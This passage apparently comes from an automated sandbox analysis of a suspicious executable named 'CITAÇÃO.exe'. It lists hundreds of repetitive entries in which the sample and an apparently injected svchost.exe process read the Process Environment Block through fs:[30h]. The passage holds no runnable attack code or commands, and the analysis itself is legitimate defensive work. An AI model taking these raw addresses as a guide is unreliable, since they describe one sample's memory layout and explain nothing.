            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_03F71540 mov eax, dword ptr fs:[00000030h] 0_2_03F71540
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_03F74DA8 mov eax, dword ptr fs:[00000030h] 0_2_03F74DA8
            Source: C:\Users\user\Desktop\CITA#U00c7#U00c3O.exe | Code function: 0_2_03F74D48 mov eax, dword ptr fs:[00000030h] 0_2_03F74D48
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h] 1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h] 1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h] 1_2_0306A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h] 1_2_0302C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h] 1_2_03050310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h] 1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h] 1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h] 1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h] 1_2_03108324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h] 1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h] 1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h] 1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h] 1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h] 1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h] 1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h] 1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h] 1_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h] 1_2_030D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310634F mov eax, dword ptr fs:[00000030h] 1_2_0310634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D437C mov eax, dword ptr fs:[00000030h] 1_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h] 1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h] 1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h] 1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h] 1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h] 1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h] 1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h] 1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h] 1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h] 1_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h] 1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h] 1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h] 1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h] 1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h] 1_2_030B63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h] 1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h] 1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h] 1_2_030DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h] 1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h] 1_2_030D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h] 1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030663FF mov eax, dword ptr fs:[00000030h] 1_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302823B mov eax, dword ptr fs:[00000030h] 1_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h] 1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h] 1_2_030B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0310625D mov eax, dword ptr fs:[00000030h] 1_2_0310625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h] 1_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03036259 mov eax, dword ptr fs:[00000030h] 1_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h] 1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h] 1_2_030EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h] 1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h] 1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h] 1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302826B mov eax, dword ptr fs:[00000030h] 1_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h] 1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h] 1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h] 1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h] 1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h] 1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h] 1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h] 1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h] 1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h] 1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h] 1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h] 1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h] 1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h] 1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031062D6 mov eax, dword ptr fs:[00000030h] 1_2_031062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h] 1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h] 1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h] 1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h] 1_2_030DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h] 1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h] 1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h] 1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h] 1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h] 1_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03060124 mov eax, dword ptr fs:[00000030h] 1_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h] 1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h] 1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h] 1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h] 1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h] 1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h] 1_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C8158 mov eax, dword ptr fs:[00000030h] 1_2_030C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h] 1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03036154 mov eax, dword ptr fs:[00000030h] 1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03104164 mov eax, dword ptr fs:[00000030h] 1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03104164 mov eax, dword ptr fs:[00000030h] 1_2_03104164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03070185 mov eax, dword ptr fs:[00000030h] 1_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h] 1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h] 1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h] 1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D4180 mov eax, dword ptr fs:[00000030h] 1_2_030D4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h] 1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h] 1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h] 1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B019F mov eax, dword ptr fs:[00000030h] 1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h] 1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h] 1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h] 1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h] 1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h] 1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AE1D0 mov ecx, dword ptr fs:[00000030h] 1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AE1D0 mov eax, dword ptr fs:[00000030h] 1_2_030AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h] 1_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h] 1_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B4000 mov ecx, dword ptr fs:[00000030h] 1_2_030B4000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h] 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h] 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h] 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h] 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h] 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h] 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h] 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030D2000 mov eax, dword ptr fs:[00000030h] 1_2_030D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h] 1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h] 1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h] 1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h] 1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h] 1_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h] 1_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C6030 mov eax, dword ptr fs:[00000030h] 1_2_030C6030
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03032050 mov eax, dword ptr fs:[00000030h] 1_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B6050 mov eax, dword ptr fs:[00000030h] 1_2_030B6050
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h] 1_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0303208A mov eax, dword ptr fs:[00000030h] 1_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030280A0 mov eax, dword ptr fs:[00000030h] 1_2_030280A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030C80A8 mov eax, dword ptr fs:[00000030h] 1_2_030C80A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h] 1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h] 1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B20DE mov eax, dword ptr fs:[00000030h] 1_2_030B20DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302A0E3 mov ecx, dword ptr fs:[00000030h] 1_2_0302A0E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030380E9 mov eax, dword ptr fs:[00000030h] 1_2_030380E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030B60E0 mov eax, dword ptr fs:[00000030h] 1_2_030B60E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0302C0F0 mov eax, dword ptr fs:[00000030h] 1_2_0302C0F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030720F0 mov ecx, dword ptr fs:[00000030h] 1_2_030720F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306C700 mov eax, dword ptr fs:[00000030h] 1_2_0306C700
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03030710 mov eax, dword ptr fs:[00000030h] 1_2_03030710
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03060710 mov eax, dword ptr fs:[00000030h] 1_2_03060710
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h] 1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306C720 mov eax, dword ptr fs:[00000030h] 1_2_0306C720
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h] 1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306273C mov ecx, dword ptr fs:[00000030h] 1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306273C mov eax, dword ptr fs:[00000030h] 1_2_0306273C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030AC730 mov eax, dword ptr fs:[00000030h] 1_2_030AC730
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306674D mov esi, dword ptr fs:[00000030h] 1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h] 1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0306674D mov eax, dword ptr fs:[00000030h] 1_2_0306674D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03030750 mov eax, dword ptr fs:[00000030h] 1_2_03030750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030BE75D mov eax, dword ptr fs:[00000030h] 1_2_030BE75D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h] 1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03072750 mov eax, dword ptr fs:[00000030h] 1_2_03072750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B4755 mov eax, dword ptr fs:[00000030h]1_2_030B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03038770 mov eax, dword ptr fs:[00000030h]1_2_03038770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03040770 mov eax, dword ptr fs:[00000030h]1_2_03040770
